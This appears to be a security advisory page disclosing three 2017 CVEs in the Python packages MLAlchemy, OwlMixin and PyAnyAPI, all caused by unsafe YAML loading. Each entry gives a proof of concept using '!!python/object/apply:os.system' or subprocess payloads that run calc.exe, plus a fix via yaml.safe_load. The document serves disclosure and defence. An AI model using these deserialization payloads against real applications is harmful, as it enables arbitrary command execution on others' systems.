CVE-2017-16615: Critical RESTful Web Applications Vulnerability

Python Package:  MLAlchemy

Version:      Before 0.2.2

Published:    Nov. 7th. 2017

Reported by:       Joel

CVE-2017-16615    CVE_details

Overview

MLAlchemy is a Python-based utility library aimed at allowing relatively safe conversion from YAML/JSON to SQLAlchemy read-only queries. One use case here is to allow RESTful web applications (written in Python) to receive YAML- or JSON-based queries for data, e.g. from a front-end JavaScript-based application. By exploiting vulnerability, attackers can execute arbitrary python commands resulting in command execution. Due to a wide range of involved, the vulnerability is extremely dangerous.

An issue was discovered in the MLAlchemy package before 0.2.2.Untrusted data passed into the parse_yaml_query() function can execute arbitrary python commands resulting in command execution.

POC

1
2
from mlalchemy import parse_yaml_query
parse_yaml_query('!!python/object/apply:os.system ["calc.exe"]')
Poc Video

Remediation

The updated versions of MLAlchemy (0.2.2) correctly use the yaml.safe_load method which prevents remote code execution.

CVE-2017-16618: Convert Through OwlMixin

Python Package:  OwlMixin

Version:      Before 2.0.0a12

Published:    Nov. 7th. 2017

Reported by:       Joel

CVE-2017-16618    CVE_details

Overview

OwlMixin is a Library which converts data class instance and others each other.Recently,an issue was discovered in the owlmixin package before 2.0.0a12.Untrusted data passed into the load_yaml() and the load_yamlf() functions can execute arbitrary python commands resulting in command execution.

POC

1
2
3
4
from owlmixin import util
util.load_yaml('!!python/object/apply:os.system ["calc.exe"]')
util.load_yamlf('joel.yml','utf-8')
#'joel.yml':!!python/object/apply:os.system ["calc.exe"]
Poc Video

Remediation

The updated versions of OwlMixin (2.0.0a12) correctly use the yaml.safe_load method which prevents remote code execution.

CVE-2017-16616: YAMLParser in PyAnyAPI

Python Package:  PyAnyAPI

Version:      Before 0.6.1

Published:    Nov. 7th. 2017

Reported by:       Joel

CVE-2017-16616    CVE_details

Overview

PyAnyAPI is a Library for for convenient interface creation over various types of data in a declarative way. An issue was discovered in the pyanapi package before 0.6.1.Untrusted data passed into the yaml.load() function can execute arbitrary python commands resulting in command execution.

POC

1
2
3
from pyanyapi import YAMLParser
YAMLParser({'test': 'container > test'}).parse('!!python/object/apply:os.system ["calc.exe"]').test
YAMLParser({'test': 'container > test'}).parse('!!python/object/new:subprocess.check_output [["calc.exe"]]').test
Poc Video

Remediation

The updated versions of PyAnyAPI (0.6.1) correctly use the yaml.safe_load method which prevents remote code execution.